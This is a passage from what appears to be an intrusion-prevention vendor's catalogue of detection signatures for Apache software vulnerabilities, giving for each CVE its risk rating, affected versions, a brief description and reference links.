Description: An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
Situation: Generic_CS-Apache-Airflow-Celery-Broker-RCE-CVE-2020-11981
References:
CVE-2020-11981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11981
Back to top

Apache-Airflow-Dag-OS-Command-Injection

About this vulnerability: A vulnerability in Apache Software Foundation Airflow
Risk: Moderate
First detected in: sgpkg-ips-1451-5242
Last changed: sgpkg-ips-1451-5242
Platform: Generic
Software: Apache Airflow
Type: Input Validation
Description: Improper input validation for parameters for certain directed acyclic graphs (DAGs) in user-sent data causes a command injection vulnerability in Apache Airflow. A successful exploit allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-Apache-Airflow-Dag-OS-Command-Injection
References:
CVE-2022-24288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24288
Back to top

Apache-Airflow-Dag-Run_Id-Command-Injection

About this vulnerability: A vulnerability in Apache Airflow.
Risk: High
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1533-5242
Platform: Generic
Software: Apache Airflow
Type: Input Validation
Description: A vulnerability in Apache Airflow, versions before 2.4.0, which allows remote attackers to execute arbitrary commands by sending a crafted request to the target server, due to improper input validation for parameter "run_id" for directed acyclic graphs (DAGs).
Situation: HTTP_CRL-Apache-Airflow-Dag-Run_Id-Command-Injection
References:
CVE-2022-40127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40127
Back to top

Apache-Airflow-Experimental-API-Authentication-Bypass-CVE-2020-13927

About this vulnerability: A vulnerability in Apache Airflow
Risk: High
First detected in: sgpkg-ips-1820-5242
Last changed: sgpkg-ips-1820-5242
Platform: Generic
Software: Apache Airflow
Type: Insecure Configuration
Description: Apache Airflow Experimental API default settings in versions prior to 1.10.11 allowed access without any authentication requirements. The default behaviour was changed in version 1.10.11 to deny all requests. This vulnerability can be combined with CVE-2020-11978 for unauthenticated remote code execution.
Situation: HTTP_CSU-Apache-Airflow-Experimental-API-Request
References:
CVE-2020-13927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13927
Back to top

Apache-Airflow-Origin-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Airflow
Risk: High
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: Apache Airflow
Type: Input Validation
Description: There exists a vulnerability in Apache Airflow, versions prior to 1.10.12, which allows remote attackers to execute arbitrary code via the 'origin' parameter due to insufficient user input validation.
Situation: HTTP_CRL-Apache-Airflow-Origin-Cross-Site-Scripting
References:
CVE-2020-13944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13944
Back to top

Apache-Airflow-Remote-Code-Execution-CVE-2020-11978

About this vulnerability: An attempt to exploit a vulnerability in Apache Airflow
Risk: High
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1428-5242
Platform: Generic
Software: Apache Airflow
Type: Input Validation
Description: There exists a vulnerability in Apache Airflow, versions 1.10.10 and earlier, which allows authenticated remote attackers to execute arbitrary code via an example DAG shipped with Airflow.
Situation: HTTP_CRL_Apache-Airflow-Remote-Code-Execution-CVE-2020-11978
References:
CVE-2020-11978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11978
Back to top

Apache-APISIX-Admin-API-Default-Access-Token-RCE

About this vulnerability: A vulnerability in Apache APISIX.
Risk: High
First detected in: sgpkg-ips-1445-5242
Last changed: sgpkg-ips-1445-5242
Platform: Unix
Software: Apache APISIX
Type: Insecure Configuration
Description: A vulnerability in Apache APISIX, versions before 2.x, which allows remote attackers to access all of the admin API, which leads to remote LUA code execution through the script parameter.
Situation: HTTP_CS-Apache-APISIX-Admin-API-Default-Access-Token-RCE
References:
CVE-2020-13945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13945
Back to top

Apache-APISIX-Batch-Requests-Plugin-IP-Restriction-Bypass

About this vulnerability: A vulnerability in Apache Software Foundation APISIX
Risk: Moderate
First detected in: sgpkg-ips-1448-5242
Last changed: sgpkg-ips-1448-5242
Platform: Generic
Software: Apache APISIX
Type: Malfunction
Description: Insufficient validation of client requests causes a policy bypass vulnerability in Apache APISIX. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Apache-APISIX-Batch-Requests-Plugin-IP-Restriction-Bypass
References:
CVE-2022-24112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24112
Back to top

Apache-APISIX-Dashboard-Middleware-Authentication-Bypass

About this vulnerability: A vulnerability in Apache APISIX Dashboard.
Risk: High
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Platform: Unix
Software: Apache APISIX
Type: Malfunction
Description: An vulnerability in Apache APISIX Dashboard, versions prior to 2.10.1, which allows remote attackers to execute arbitrary code by sending a crafted request to a vulnerable server, due to APIs using the interface of framework "gin" directly, resulting in authentication bypass.
Situation: HTTP_CSU-Apache-APISIX-Dashboard-Middleware-Authentication-Bypass
References:
CVE-2021-45232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45232
Back to top

Apache-Apr-Apr_Fnmatch-Stack-Overflow-DOS

About this vulnerability: A vulnerability in Apache APR
Risk: Moderate
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache APR; Apache2
Type: Malfunction
Description: A stack overflow vulnerability exists in the Apache Portable Runtime (APR) library. The vulnerability is due to improper implementation of fnmatch, in the apr_fnmatch.c component. The vulnerable function can be reached through the use of the mod_autoindex component.
Situation: HTTP_CSU-Apache-Apr-Apr_Fnmatch-Stack-Overflow-DOS
References:
CVE-2011-0419
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0419
Back to top

Apache-Apr-Util-IPv6-URI-Parsing

About this vulnerability: A vulnerability in Apache
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: A input validation vulnerability exists in the way the apr-util library, a component of the Apache 2.x HTTP server, parses URI strings.. The vulnerability can be triggered by sending a crafted URL which contain a malformed IPv6 literal addresses. The vulnerability is exploitable whether or not the HTTP server is bound to an IPv4 or IPv6 address. An attacker can trigger the vulnerability to create a denial of service condition. Under some configurations or platforms, exploitation of the vulnerability could lead to remote code execution.
Situation: HTTP_CSU-Apache-Apr-Util-IPv6-URI-Parsing-2
HTTP_CSU-Apache-Apr-Util-IPv6-URI-Parsing
References:
CVE-2004-0786
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0786
Back to top

Apache-Apr-Util-IPv6-URI-Parsing-Vulnerability

About this vulnerability: An Apache apr-util IPv6 URI Parsing vulnerability
Risk: High
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Input Validation
Description: A vulnerability in Apache HTTP server which allows remote attackers to cause a denial of service condition by sending a crafted URL which contains a malformed IPv6 literal address, weather or not the HTTP server is bound to an IPv4 or IPv6 address.
Situation: HTTP_CS-Apache-Apr-Util-IPv6-URI-Parsing-Vulnerability
References:
CVE-2004-0786
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0786
Back to top

Apache-Axis-Jsp-File-Upload

About this vulnerability: JSP file upload to Apache Axis web service
Risk: Moderate
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Axis
Type: Malfunction
Description: Uploading script source code files to vulnerable servers may give an attacker the chance of executing arbitrary scripts on target computer.
Situation: HTTP_CS-Apache-Axis-Jsp-File-Upload
References:
CVE-2008-0457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0457
BID-27487
http://www.securityfocus.com/bid/27487
Back to top

Apache-Axis-Soap-Array-Exhaustion

About this vulnerability: A vulnerability in Apache Axis
Risk: Moderate
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Axis
Type: Resource Starvation
Description: A vulnerability exists in the way Apache Axis handles requests with SOAP arrays in the parameters.
Situation: File-TextId_Apache-Axis-Soap-Array-Exhaustion
References:
CVE-2004-1815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1815
BID-9877
http://www.securityfocus.com/bid/9877
Back to top

Apache-Axis-Soap-Web-Services-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Axis
Risk: High
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: Apache Axis; ColdFusion; Macromedia JRun 4; Java Application Server
Type: Resource Starvation
Description: A vulnerability exists in the way Apache Axis handles requests with SOAP arrays in the parameters. Apache Axis is embedded within several Web Services packages. Attackers can trigger the vulnerability to cause a denial of service condition in a vulnerable service.
Situation: File-TextId_Apache-Axis-Soap-Web-Services-Denial-Of-Service
Back to top

Apache-Byte-Range-Filter-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-354-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache2
Type: Malfunction
Description: There exists a denial of service vulnerability in the Apache HTTP Server byte-range filter. The vulnerability occurs during the handling of requests that include a byte-range value, when HTTP Server is configured to act as a proxy. This flaw can cause the excess consumption of memory resources. A remote attacker can exploit the vulnerability by sending specially crafted HTTP requests to the target server, potentially causing denial of service.
Situation: HTTP_CSH-Apache-Byte-Range-Filter-Denial-Of-Service
References:
CVE-2005-2728
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2728
BID-14660
http://www.securityfocus.com/bid/14660
Back to top

Apache-Camel-Filter-Bypass-CVE-2025-27636

About this vulnerability: A vulnerability in Apache Camel
Risk: High
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Platform: Generic
Software: Apache Camel
Type: Input Validation
Description: A filter bypass in Apache Camel allows unauthenticated attackers to execute internal Camel methods via crafted HTTP headers. Specific conditions are required for this vulnerability to be present. Versions 4.10.0-4.10.1, 4.8.0-4.8.4, and 3.10.0-3.22.3 are affected.
Situation: HTTP_CSH-Apache-Camel-Filter-Bypass-CVE-2025-27636
References:
CVE-2025-27636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27636
Back to top

Apache-Camel-Filter-Bypass-CVE-2025-29891

About this vulnerability: A vulnerability in Apache Camel
Risk: Moderate
First detected in: sgpkg-ips-1849-5242
Last changed: sgpkg-ips-1849-5242
Platform: Generic
Software: Apache Camel
Type: Input Validation
Description: A filter bypass in Apache Camel allows unauthenticated attackers to execute internal Camel methods via crafted HTTP URI parameters. Specific conditions are required for this vulnerability to be present. Versions 4.10.0-4.10.1, 4.8.0-4.8.4, and 3.10.0-3.22.3 are affected.
Situation: HTTP_CRL-Apache-Camel-Filter-Bypass-CVE-2025-29891
References:
CVE-2025-29891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-29891
Back to top

Apache-Camel-XSLT-Component-Java-Code-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Camel
Risk: High
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-1734-5242
Platform: Generic
Software: Apache Camel; Apache ActiveMQ
Type: Malfunction
Description: A code execution vulnerability has been reported in Apache Camel. The vulnerability is due to an error in handling XSL stylesheets in the XSLT component. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted XML message to the vulnerable server. Successful exploitation could result in the execution of arbitrary Java code on the target system with the privileges of the server process.
Situation: File-TextId_Apache-Camel-XSLT-Component-Java-Code-Execution
References:
CVE-2014-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0003
BID-65902
http://www.securityfocus.com/bid/65902
OSVDB-103917
http://www.osvdb.org/103917
Back to top

Apache-Camel-XSLT-Component-Xml-External-Entity

About this vulnerability: A vulnerability in Apache Software Foundation Camel
Risk: High
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Camel; Apache ActiveMQ
Type: Input Validation
Description: An XML External Entity (XXE) vulnerability has been reported in Apache Camel. The vulnerability is due to an error in handling XSL stylesheets in the XSLT component. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted XML message to the vulnerable server. Successful exploitation could result in the disclosure of arbitrary files accessible to the server's context, server-side request forgery, and/or policy bypass.
Situation: HTTP_CS-Xml-Dtd-External-Entity-Multiple-Vulnerabilities
File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities
References:
CVE-2014-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0002
BID-65901
http://www.securityfocus.com/bid/65901
OSVDB-103916
http://www.osvdb.org/103916
Back to top

Apache-Cloudstack-Saml-Authentication-Bypass

About this vulnerability: A vulnerability in Apache Software Foundation CloudStack
Risk: Moderate
First detected in: sgpkg-ips-1766-5242
Last changed: sgpkg-ips-1766-5242
Platform: Generic
Software: Apache CloudStack
Type: Malfunction
Description: An authentication bypass injection vulnerability has been reported in Apache CloudStack. The vulnerability is due to missing validation of SAML signatures. A remote, unauthenticated attacker can exploit this vulnerability by sending a spoofed SAML response to the target server, with no signature and a known or guessed username. Successful exploitation would result in the attacker being authenticated as the SAML-enabled user account.
Situation: HTTP_CRL-Apache-Cloudstack-Saml-Authentication-Bypass
References:
CVE-2024-41107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41107
Back to top

Apache-Commons-Collections-Object-Deserialization-Code-Execution-Vulnerability

About this vulnerability: A vulnerability in Apache commons-collections library
Risk: High
First detected in: sgpkg-ips-706-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Buffer Overflow
Description: There is a remote code execution vulnerability in Apache commons-collection library, which is used by many Java applications. The vulnerability is related to the deserialization of Java objects. A remote attacker can exploit this vulnerability by connecting to a JRMI interface without authenticating.
Situation: Shared_CS-Java-Rmi-Object-Deserialization-Code-Execution-2
Shared_CS-Java-Rmi-Object-Deserialization-Code-Execution
Shared_CS-Java-Rmi-Usage
Back to top

Apache-Commons-Fileupload-Parserequest-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Commons FileUpload
Risk: High
First detected in: sgpkg-ips-1633-5242
Last changed: sgpkg-ips-1633-5242
Platform: Generic
Software: Apache Commons FileUpload
Type: Input Validation
Description: A denial of service vulnerability has been reported in Apache Commons FileUpload. This vulnerability is due to a failure to properly handle file upload requests with a large number of request parts. A remote attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in a denial of service on the target server.
Situation: HTTP_CS-Apache-Commons-Fileupload-Parserequest-Denial-Of-Service
References:
CVE-2023-24998
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24998
Back to top

Apache-Commons-Text-Remote-Code-Execution-CVE-2022-42889

About this vulnerability: A vulnerability in Apache Commons Text
Risk: High
First detected in: sgpkg-ips-1517-5242
Last changed: sgpkg-ips-1517-5242
Platform: Generic
Software: Apache Commons Text
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Apache Commons Text library versions from 1.5 to 1.9.
Situation: HTTP_CS-Apache-Commons-Text-Remote-Code-Execution-CVE-2022-42889
HTTP_CRL-Apache-Commons-Text-Remote-Code-Execution-CVE-2022-42889
References:
CVE-2022-42889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42889
Back to top

Apache-Continuum-Command-Injection

About this vulnerability: An Apache Continuum Command Injection vulnerability
Risk: High
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Apache Continuum
Type: Input Validation
Description: A vulnerbility in Apache Continuum, versions 1.4.2 and before, which allows remote attackers to execute arbitrary commands by sending a crafted request to the installation.varValue parameter in saveInstallation.action.
Situation: HTTP_CRL-Apache-Continuum-Command-Injection
Back to top

Apache-Couchdb-Config-Command-Execution

About this vulnerability: A vulnerability in Apache Software Foundation CouchDB
Risk: Moderate
First detected in: sgpkg-ips-1025-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Software Foundation CouchDB
Type: Malfunction
Description: Improper handling of configuration-related HTTP requests causes a command execution vulnerability in Apache CouchDB. A successful exploitation allows an attacker to execute arbitrary commands on the target system with the privileges of the CouchDB process.
Situation: HTTP_CSU-Apache-Couchdb-Config-Command-Execution
References:
CVE-2017-12636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12636
Back to top

Apache-Couchdb-Config-Command-Execution-CVE-2018-8007

About this vulnerability: A vulnerability in Apache Software Foundation Couchdb
Risk: Moderate
First detected in: sgpkg-ips-1088-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Software Foundation CouchDB
Type: Input Validation
Description: Insufficient validation of configuration settings sent via the HTTP API causes a command execution vulnerability in Apache Couchdb. A successful expoit allows an attacker to remotely run arbitrary code on the target system.
Situation: HTTP_CRL-Apache-Couchdb-Config-Command-Execution-CVE-2018-8007
References:
CVE-2018-8007
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8007
Back to top

Apache-Couchdb-Erlang-RCE

About this vulnerability: A vulnerability in Apache CouchDB.
Risk: High
First detected in: sgpkg-ips-1526-5242
Last changed: sgpkg-ips-1825-5242
Platform: Linux; Unix; Windows
Software: Apache Software Foundation CouchDB
Type: Input Validation
Description: A vulnerability in Apache CouchDB, versions before 3.2.2, which allows remote attackers to access an improperly secured default installation without authenticating and gain admin privileges.
Situation: Generic_CS-Apache-Couchdb-Erlang-RCE
Generic_CS-Potential-Apache-Couchdb-Erlang-RCE
References:
CVE-2022-24706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24706
Back to top

Apache-Couchdb-JSON-Remote-Privilege-Escalation

About this vulnerability: A vulnerability in Apache Software Foundation CouchDB
Risk: Moderate
First detected in: sgpkg-ips-1021-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Software Foundation CouchDB
Type: Malfunction
Description: Improper handling of client-sent JSON objects causes a privilege escalation vulnerability in Apache CouchDB. A successful exploit allows access to the database.
Situation: HTTP_CS-Apache-Couchdb-JSON-Remote-Privilege-Escalation
References:
CVE-2017-12635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12635
BID-101868
http://www.securityfocus.com/bid/101868
Back to top

Apache-Cxf-Services-Stylesheetpath-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Software Foundation CXF
Risk: Moderate
First detected in: sgpkg-ips-1304-5242
Last changed: sgpkg-ips-1304-5242
Platform: Generic
Software: Apache Software Foundation CXF
Type: Input Validation
Description: Improper sanitization of an URL parameter causes a cross-site scripting vulnerability in Apache CXF. A successful exploitation can allow an attacker to run arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Apache-Cxf-Services-Stylesheetpath-Cross-Site-Scripting
References:
CVE-2020-13954
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13954
Back to top

Apache-Druid-Javascriptdimfilter-Remote-Code-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Druid
Risk: High
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Platform: Generic
Software: Apache Druid
Type: Input Validation
Description: A remote code execution has been reported in Apache Druid. The vulnerability is due to improper deserialization of JSON data into java objects. A remote attacker could exploit this vulnerability by sending a crafted request with empty name in the JSON data to bind injected data with the java objects. Successful exploitation will allow an attacker to execute arbitrary code with the privileges of the running Druid server.
Situation: HTTP_CRL-Apache-Druid-Javascriptdimfilter-Remote-Code-Execution
References:
CVE-2021-25646
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646
Back to top

Apache-Druid-JDBC-Connection-Properties-Remote-Code-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Druid
Risk: Moderate
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Platform: Generic
Software: Apache Druid
Type: Input Validation
Description: Insufficient validation of MySQL JDBC connection URL properties causes a deserialization vulnerability in Apache Druid. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Apache-Druid-JDBC-Connection-Properties-Remote-Code-Execution
References:
CVE-2021-26919
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26919
Back to top

Apache-Druid-JNDI-Injection-RCE

About this vulnerability: A vulnerability in Apache Druid detected
Risk: High
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Platform: Generic
Software: Apache Druid
Type: Insecure Configuration
Description: A vulnerability in Apache Druid, versions 2.3.0 to 3.3.2, which allows remote attackers to set the sasl.jaas.config property of any Kafka client to com.sun.security.auth.module.JndiLoginModule, which leads to the ability to execute java deserialization gadget chains on the Kafka connect server.
Situation: HTTP_CRL-Apache-Druid-JNDI-Injection-RCE
References:
CVE-2023-25194
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25194
Back to top

Apache-Dubbo-Httpremoteinvocation-Insecure-Deserialization

About this vulnerability: A vulnerability in Apache Software Foundation Dubbo
Risk: Moderate
First detected in: sgpkg-ips-1242-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Dubbo
Type: Input Validation
Description: Insecure deserialization of remotely sent payloads causes a vulnerability in Apache Dubbo. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: File-Binary_Apache-Dubbo-Httpremoteinvocation-Insecure-Deserialization
References:
CVE-2019-17564
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17564
Back to top

Apache-Dubbo-Routing-Configuration-Unsafe-YAML-Unmarshalling

About this vulnerability: A vulnerability in Apache Software Foundation Dubbo
Risk: High
First detected in: sgpkg-ips-1366-5242
Last changed: sgpkg-ips-1366-5242
Platform: Generic
Software: Apache Dubbo
Type: Input Validation
Description: A remote code execution vulnerability has been reported in Apache Dubbo. The vulnerability is due to unsafe YAML unmarshalling. An unauthenticated, remote attacker can exploit these vulnerability by enticing an Apache Dubbo Consumer or Producer to connect to a malicious Registry. Successful exploitation can result in the execution of arbitrary code under the security context of the Dubbo server.
Situation: Generic_TCP-Apache-Dubbo-Routing-Configuration-Unsafe-YAML-Unmarshalling
References:
CVE-2021-30180
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30180
Back to top

Apache-Dubbo-Script-Routing-Remote-Code-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Dubbo
Risk: Moderate
First detected in: sgpkg-ips-1359-5242
Last changed: sgpkg-ips-1359-5242
Platform: Generic
Software: Apache Dubbo
Type: Malfunction
Description: A remote code execution exists in the Script routing component of Apache Dubbo. The vulnerability is due to an unsandboxed script execution while processing a Script Routing rule. A remote attacker can exploit this vulnerability by enticing an Apache Dubbo Consumer to connect to a malicious Registry. Successful exploitation can result in arbitrary code execution under the security context of the affected Consumer.
Situation: Generic_TCP-Apache-Dubbo-Script-Routing-Remote-Code-Execution
References:
CVE-2021-30181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30181
Back to top

Apache-Fineract-Imagesapiresource-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Apache Software Foundation Fineract
Risk: Moderate
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1554-5242
Platform: Generic
Software: Apache Software Foundation Fineract
Type: Input Validation
Description: A directory traversal vulnerability has been reported in Apache Fineract. The vulnerability is due to insufficient sanitation of paths during file uploads. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could lead to code execution in the context of the server process.
Situation: HTTP_CSH-Apache-Fineract-Imagesapiresource-Arbitrary-File-Upload
References:
CVE-2022-44635
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44635
Back to top

Apache-Flink-CVE-2020-17519

About this vulnerability: A vulnerability in Apache Flink
Risk: High
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Platform: Generic
Software: Apache Flink
Type: Directory Traversal
Description: There has been reported a path traversal vulnerability in Apache Flink versions 1.11.0, 1.11.1, and 1.11.2. Successful exploitation may allow attackers to read files on the local filesystem of the JobManager through the JobManager REST API.
Situation: HTTP_CRL-Apache-Flink-CVE-2020-17519
References:
CVE-2020-17519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17519
Back to top

Apache-Flink-FileUploadHandler-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Apache Flink
Risk: High
First detected in: sgpkg-ips-1324-5242
Last changed: sgpkg-ips-1324-5242
Platform: Generic
Software: Apache Flink
Type: Directory Traversal
Description: There exists a vulnerability in Apache Flink, versions 1.11.0 to 1.11.2, that allows remote attackers to execute arbitrary code due to the insufficient validation of user input when uploading files in the FileUploadHandler class.
Situation: HTTP_CS_Apache-Flink-FileUploadHandler-Arbitrary-File-Upload
References:
CVE-2020-17518
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17518
Back to top

Apache-Flink-JAR-Upload-Java-Code-Execution

About this vulnerability: A vulnerability in Apache Flink.
Risk: High
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Linux; Windows
Software: Apache Flink
Type: Insecure Configuration
Description: A vulnerability in Apache Flink which allows remote unauthenticated attackers to upload and execute arbitrary JAR files, leading to remote Java code execution.
Situation: HTTP_CRL-Apache-Flink-JAR-Upload-Java-Code-Execution
Back to top

Apache-HTTP-Server-Illegal-Character-File-Disclosure

About this vulnerability: File disclosure vulnerability in Apache
Risk: Moderate
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Apache
Type: Malfunction
Description: Apache HTTP Server versions 2.0.43 and earlier running on Microsoft Windows systems could allow a remote attacker to bypass default script mapping rules and obtain restricted files. A remote attacker could send a specially-crafted URL request for a known CGI or PHP script appended with illegal characters, which would allow the attacker to bypass script mapping rules and obtain the targeted file.
Situation: HTTP_CSU-Apache-HTTP-Server-Illegal-Character-File-Disclosure
References:
CVE-2003-0017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0017
BID-6660
http://www.securityfocus.com/bid/6660
OSVDB-9710
http://www.osvdb.org/9710
Back to top

Apache-HTTP-Server-Mod-Cache-Module-Denial-Of-Service

About this vulnerability: Null-dereference vulnerability in the mod_cache module in Apache HTTP Server
Risk: Low
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: There is a null-dereference vulnerability in the mod_cache module in Apache HTTP Server. By sending a malformed HTTP request to the affected server that has the mod_cache parsing enabled, a remote attacker can cause a denial of service condition.
Situation: HTTP_CSH-Apache-HTTP-Server-Mod-Cache-Module-Denial-Of-Service
References:
CVE-2007-1863
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1863
BID-24649
http://www.securityfocus.com/bid/24649
OSVDB-37079
http://www.osvdb.org/37079
Back to top

Apache-HTTP-Server-Mod-Dav-Merge-Request-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: High
First detected in: sgpkg-ips-535-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: A denial of service vulnerability has been reported in the mod_dav component of Apache HTTP Server. The vulnerability is due to a NULL pointer dereference when processing a MERGE request with a URI whose source href points to a non-DAV configured URI. A remote attacker can send a crafted HTTP request to trigger the vulnerability and cause the HTTP server daemon process to segfault, creating a denial of service condition.
Situation: HTTP_CS-Apache-HTTP-Server-Mod-Dav-Merge-Request-Denial-Of-Service
References:
CVE-2013-1896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1896
OSVDB-95498
http://www.osvdb.org/95498
Back to top

Apache-HTTP-Server-Mod-Negotiation-Filename-Handling-Cross-Site-Scripting

About this vulnerability: A cross-site scripting vulnerability in Apache HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: There is a cross-site scripting vulnerability in Apache HTTP Server. The vulnerability is due to insufficient validation of user-supplied input data in the mod_negotiation module. The flaw may be exploited by malicious users to execute arbitrary HTML code in the target user's web browser in the context of a trusted web site.
Situation: HTTP_CSU-Apache-HTTP-Server-Mod-Negotiation-Filename-Handling-XSS
References:
CVE-2008-0455
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0455
BID-27409
http://www.securityfocus.com/bid/27409
Back to top

Apache-HTTP-Server-Mod_Cache-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: A denial of service vulnerability exists in Apache HTTP server. The vulnerability is due to a NULL pointer dereference in the cache_invalidate() in mod_cache module. A remote unauthenticated attacker can leverage this vulnerability by sending a malicious response to the target server. Successful exploitation would result in a denial of service condition on the target.
Situation: HTTP_SHS-Apache-HTTP-Server-Mod_Cache-Denial-Of-Service
References:
CVE-2013-4352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4352
BID-68863
http://www.securityfocus.com/bid/68863
OSVDB-109233
http://www.osvdb.org/109233
Back to top

Apache-HTTP-Server-Mod_Deflate-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Resource Starvation
